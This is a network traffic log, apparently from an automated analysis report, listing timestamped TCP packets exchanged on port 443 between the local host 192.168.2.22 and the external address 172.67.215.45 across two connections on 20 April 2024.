Apr 20, 2024 11:36:04.342118025 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.342242002 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.342892885 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.342931032 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.342963934 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.342982054 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.343004942 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.343583107 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.343619108 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.343650103 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.343664885 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.343688965 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.344399929 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.344428062 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.344459057 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.344477892 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.344500065 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.344578028 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.344614029 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.344635963 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.344649076 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.344677925 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.344718933 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.345529079 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.345557928 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.345594883 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.345612049 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.345637083 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.346194029 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.346225977 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.346261978 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.346281052 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.346303940 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.347019911 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.347048998 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.347084045 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.347096920 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.347124100 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.347646952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.347690105 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.347722054 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.347733021 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.347759008 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.347976923 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.348007917 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.348037958 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.348052025 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.348078966 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.348820925 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.348854065 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.348880053 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.348892927 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.348925114 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.348925114 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.348931074 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.348967075 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.348984003 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.348995924 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.349025011 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.349097013 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.349777937 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.349806070 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.349837065 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.349848986 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.349889994 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.350699902 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.350729942 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.350765944 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.350784063 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.350805998 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.350817919 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.350845098 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.350878000 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.350897074 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.350922108 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.350922108 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.351733923 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.351766109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.351803064 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.351819992 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.351844072 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.352361917 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.352389097 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.352422953 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.352440119 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.352463961 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.353107929 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.353141069 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.353176117 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.353188038 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.353214979 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.353393078 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.353420019 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.353460073 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.353478909 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.353501081 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.354240894 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.354274035 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.354309082 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.354326963 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.354347944 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.355101109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.355129004 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.355163097 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.355180025 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.355202913 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.355215073 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.355249882 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.355267048 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.355278969 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.355314970 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.355334997 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.355986118 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.356014013 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.356051922 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.356070042 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.356096029 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.356695890 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.356734991 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.356761932 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.356775045 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.356801033 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.357523918 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.357553005 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.357590914 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.357606888 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.357645035 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.357645035 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.357686043 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.357708931 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.357722044 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.357748032 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.357798100 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.357863903 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.358499050 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.358529091 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.358566999 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.358566999 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.358582020 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.358608961 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.359210014 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.359244108 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.359270096 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.359283924 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.359308004 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.359529018 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.359555960 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.359586954 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.359603882 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.359627962 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.360342979 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.360374928 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.360399961 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.360413074 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.360440969 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.360825062 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.360852957 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.360883951 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.360896111 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.360920906 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.361747980 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.361778975 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.361809969 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.361820936 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.361848116 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.361877918 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.361907959 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.361924887 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.361937046 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.361968994 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.362767935 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.362801075 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.362833977 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.362850904 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.362874985 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.362890959 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.362919092 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.362941980 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.362956047 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.362982035 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.363821030 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.363862038 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.363888979 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.363905907 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.363930941 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.363933086 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.363992929 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.364006042 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.364029884 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.364197969 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.371664047 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.374749899 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.204533100 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.204581976 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.204948902 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.207437992 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.207452059 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.424266100 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.429547071 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.429568052 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.684225082 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.684294939 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.684338093 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.684376955 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.684381962 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.684398890 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.684470892 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.684510946 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.684530973 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.684545994 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.684602976 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.684614897 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.684951067 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.685002089 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.685085058 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.685127020 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.685158968 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.685345888 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.685345888 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.685353994 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.685839891 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.685882092 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.685920954 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.685940027 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.685945034 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.685986996 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.686733007 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.686784029 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.686822891 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.686870098 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.686882019 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.686887026 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.686907053 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.686937094 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.687072039 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.687077045 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.687196016 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.687638044 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.687726021 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.687767029 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.687804937 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.687843084 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.687848091 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.688034058 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.688690901 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.688736916 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.688776016 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.688817024 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.688832998 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.688838005 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.688858986 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.689115047 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.689121962 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.689539909 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.689589024 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.689627886 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.689666033 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.689697027 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.689697027 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.689702988 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.689815998 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.690515995 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.690583944 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.690685034 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.690707922 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.790343046 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.790396929 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.790445089 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.790910959 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.790935040 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.791572094 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.791629076 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.791635036 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.791654110 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.791713953 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.791719913 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.792063951 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.792129040 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.792347908 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.792355061 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.793281078 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.793344021 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.793353081 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.793389082 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.793848991 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.793901920 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.793908119 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.794286966 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.794336081 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.794342041 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.794351101 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.794390917 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.794397116 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.795089960 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.795141935 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.795147896 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.795156956 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.795202017 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.795207977 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.796010971 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.796066046 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.796072006 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.796849012 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.796897888 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.796902895 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.796935081 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.796979904 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.796984911 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.797741890 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.797795057 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.797801018 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.798032999 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.798082113 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.798088074 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.814059019 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.893784046 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.893842936 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.894448996 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.894504070 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.894515991 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.894567966 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.895186901 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.895260096 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.895262957 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.895273924 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.895309925 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.895725965 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.895788908 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.896467924 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.896526098 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.896534920 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.896584034 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.897375107 CEST	443	49164	172.67.215.45	192.168.2.22
